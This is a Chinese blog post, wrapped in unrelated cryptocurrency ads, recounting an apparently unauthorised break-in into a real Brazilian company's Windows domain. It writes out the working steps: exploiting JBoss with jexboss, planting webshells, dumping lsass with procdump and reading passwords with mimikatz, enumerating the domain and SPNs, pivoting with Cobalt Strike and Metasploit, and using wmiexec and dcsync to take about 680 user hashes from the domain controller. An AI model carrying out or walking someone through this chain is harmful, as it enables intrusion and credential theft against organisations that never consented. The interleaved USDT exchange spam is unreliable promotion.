欢迎访问本站!

首页科技正文

哪个平台买usdt便宜(www.uotc.vip):从外围打点到内网渗透拿下域控

admin2021-05-0764安全技术众测渗透

Filecoin矿池

Filecoin官网(www.FLaCoin.vip)是Filecoin致力服务于使用Filecoin存储和检索数据的官方权威平台。Filecoin官网实时更新Filecoin(FIL)行情、当前Filecoin(FIL)矿池、Filecoin(FIL)收益数据、各类Filecoin(FIL)矿机出售信息。并开放Filecoin(FIL)交易所、Filecoin云矿机、Filecoin矿机出售、租用、招商等业务。

  • 0x00 前言

小弟不才,学了点内网知识就想练练手,社工一个fofa会员就跑了一手jboss的站,跑完之后无聊的时刻就拿拿shell,看看有没有域环境熟悉下dos下令。

这不,看到一个看起来对照好的站,就决议看一看他到底是何方神圣。

  • 0x01 外围打点

Jboss界面都不说了哈老铁们,进去看了一下jmx console直接秒进,真好。

不外不急,war远程部署虽然可以用,jexboss集成工具岂不是更香?

拿出jboss扫描神器jexboss扫描一手,不扫不知道一扫吓一跳,有3个破绽都可以行使,不得不说治理员照样很疏忽大意的。

直接选了个jmx-console,直接省去了手动部署的穷苦,给我弹了个shell回来,一发whoami,system权限,是真不错,准备ipconfig看一发是否有双网卡却碰了壁,不知道这是他禁了这个下令照样我毗邻欠好的缘故原由。

由于jexboss拿的终究是交互式shell,不稳固随时有掉线可能,以是我决议先冰蝎上个线,至少不能让这条system权限的鱼就这样跑掉。dir下令看一下它jboss的路径

echo冰蝎写个马进去,乐成毗邻,至此打点乐成,这里厥后查看了目录下的文件,有一个名叫jboss的xml文件,我为了隐藏起见,将名字改成了jboss.jsp

  • 0x02 本机信息搜集

拿到webshell后先 *** 往其他几个目录也放几个webshell,防止被治理员删除修复

然后依托当前机械网络尽可能多的信息,迅速领会目的的内网大致网络结构和机械软件环境,为下一步继续深入做好准备

ipconfig /all &&netstat -ano
&&arp -a查看当前机械处于哪个环境哪个网段

wmic os get
caption,csdversion,osarchitecture,version 抓明文之前领会目的系统版本
有些默认是抓不到明文的

wmic product get name,version 查看安装软件列表

whoami /user &&quer user 

tasklist /v && net start 

systeminfo

可以看到我们这里拿的是一台2008r2的主机,虽然没有双网卡,然则在域内

然后在本机里不停的寻找有用的新闻

找到一个pdf内里有一个网站

实验接见,拒绝的缘故原由是这个网站只允许内部网络接见,看来平安性照样挺高的

拿着这个名字去搜索获得这是一家位于巴西圣保罗的公司

由于系统里的文件太多且太杂,可能有些有用的文件并没有让我发现找到,然则在一份账单内里获得了他官网的地址xxxx.com.br,不外咱也不是巴西人,也看不懂葡萄牙语是吧,那只能英语翻译走一手了

大略看了一下地址也是在圣保罗,那应该十有八九这个就是他的主站,位置就在巴西的圣保罗

用在线子域名扫描发现许多子域名都剖析在了我拿到shell这个ip地址(186.xxx.xxx.xxx)上,那时就有一种这个域并不是很小的感受

信息搜集得差不多了,我决议先把他密码抓出来,用抓取dmp回内陆离线mimikatz解密的方式

先tasklist /svc查看一下杀软情形

扫描的话是没有杀软的,那么就不用做免杀了

用procdump导出

procdump64.exe -accepteula -ma lsass.exe 1.dmp

行使windows自带的压缩文件下载回内陆

makecab c:\jboss\bin\1.dmp  1.zip

看到压缩后的巨细照样小许多的,下载回来的速率也会更快

mimikatz离线读取获得域管Administrator的密码

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
  • 0x03 域内信息网络

net view /domain 查看域

net view /domain:域名称 查看域内用户

net group “domain computers” /domain 查询所有域成员盘算机列表

我这张截图还只是C开头的主机而且还没有竣事,大略估量了一下这一个大域内里至少有4.500台主机

net accounts /domain获取域密码信息

看了一下最多180天密码过时

nltest /domain_trusts 获取域信托信息

net user /domain 向AD域用户举行查询

向AD查询的用户就更多了,估量远不止4.500台,是一个异常重大的域,由于险些他三分之二的子域名都剖析到了我拿到这个shell的ip上

wmic user account get /all获取域内用户详细信息

将详细信息导出到excel,利便信息归类

,

USDT线上交易

U交所(www.9cx.net)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

dsquery user 查看存在的用户

net group “domain admins” /domain 查询域治理员用户

域管用户也许10多个

net group “Domain Controllers” /domain 查询域控

获得DC1的ip为192.168.21.3,DC2的ip为192.168.21.108,且都在我拿到权限的这个机械的域内

这里既然找到了域控,先看一下能不能行使gpp组战略

dir \\主机名\NETLOGON

dir \\主机名\SYSVOL

这里看了一下两台主机虽然都有vbs和bat,然则bat里并没有有用信息可以行使

这里我实验把ntds.dit导出举行查看,然则拒绝接见,是由于ntds并不在默认目录,我试着用下令举行查找也失败,遂放弃

  • 0x04 获取域内spn纪录

摸清域内敏感机械资产的漫衍,利便之后突破。可以拿着这些获取到的机械名,来快速完整探测当前域内的所有存活主机,通过net view照样对照禁绝的,开启防火墙也是探测不到的

setspn -T xxx.com -Q */* >spn.txt

接着对拉回来的spn文件举行处置,获取spn纪录前面的主机名字

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

通过SPN我们可以获取到域内的存活主机何一些主机的详细作用。可以通过主机的名字来获取到这个主机提供什么服务

除了SPN网络域内的信息的话,还可以通过bloodHound来获取域内的一些信息。接着快速抓取当前域内的所有用户,组,会话,数据,上传exe文件上去然后再把数据给下载回来

  • 0x05 内网存活机械及资产搜集

原本这里是准备用venom将msf带进内网打的,然则不知道为什么虽然没有杀软,就是传不上去,把几个内网穿透的软件都试完了,就是上传不上去

一最先我以为是我这边的问题,所有文件都传不上去,然则我试了一张png就能够上传上去,那么一定是把我上传的文件直接给阻挡了

我想这既然不能上传,能不能下载呢

先在内陆测试一下是能够下载的

然则一换到被攻击机上就下载不下来了,真是离谱

一筹莫展之时我想起来一个大杀器我重新到尾都没有使用过,那就是cs多人运动

我想它是出网的而且又没有杀软,虽然文件下载不知道是什么鬼问题,然则应该是能够上的吧

真好,又泛起了一丝生气,上号cs多人运动

由于之前已经把本机及域内信息搜集得差不多了,就只扫描了一个网段

C段内里也许100多台主机,但我估量并不只这么多,由于有些开防火墙我用arp扫描是探测不到的

不知道是不是我小我私人习惯的缘故原由,我以为cs在信息搜集方面确实能起到许多作用,然则真要进内网打照样看msf

以是我照样执念上msf去打,新增一个msf监听器把cs的对话派生给msf

新建一个192.168.21.0段的路由表

这里我一最先是要扫描的ip放到了一个txt里,想直接对txt举行扫描,然则不知道是 *** 作错误的缘故原由照样啥问题,不能够批量扫,那就只能手动去搞了

这里搞了一段时间,域内扫完整理出来如下:

  • 0x06 拿下DC获取hash

对内网的主机举行MS17-010破绽探测,域内机械扫出来9台,原本这个地方可以用msf获取meterpreter后用Kiwi读取密码举行整理的,然则我以为这个C段太大了,我就没有一台一台的获取session

我想的是若是我拿到了DC,直接就可以把整个域内成员hash导出来,就节约了大量时间

一样平常拿到DC都市象征性的登录远程桌面作个纪念,然则这个地方我没有登录截图,缘故原由我下面会注释

这里我直接用cs上传wmiexec.py毗邻DC

python3 ./wmiexec.py sxxxx/Administrator:密码@192.168.21.3

用mimikatz导出hash

lsadump::dcsync /domain:xxx /all /csv command

这个地方我截图导出来的hash实在是很少一部门,我将导出来的hash放入excel,这里我为了利便看我在每个hash中央都加了一个空行

这是竣事时刻的截图,由于我加了空格,盘算的话一共导出了680个用户的hash,也就是说这些用户的hash还不只是这个C段主机的hash

也就是说可能我拿的这个DC所在的这个域另有可能是个子域,这就很恐怖了,以是这里我没有打草惊蛇去登录它的远程桌面,这里我想的是用cs联动bloodhound举行更详细的剖析,但怎样现在bloodhound还用得不太熟,就此作罢

  • 0x07 后记

我想说的另有一个点是在内网渗透的历程中思绪一定要清晰,要做好信息的整合,当你网络到一些有用的信息时就要实时的整理好,否则到后面再去找就会很穷苦,好比hash、spn、wmic网络到的域内用户详细信息,都要做好实时的整理

那时在扫子域名的时刻我就预感应这个域不会是很小,然则也没有想到这个域有这么大,我拿下的可能是主域下一个很小的域,由于这个域是在是太重大了,需要花费伟大的精神和时间去研究,而且现在有些地方知识也贮备得不是很足,若是有师傅想继续往上研究的话可以联系一下小弟,实在我也想看看这个域事实会有多大,未完待续

网友评论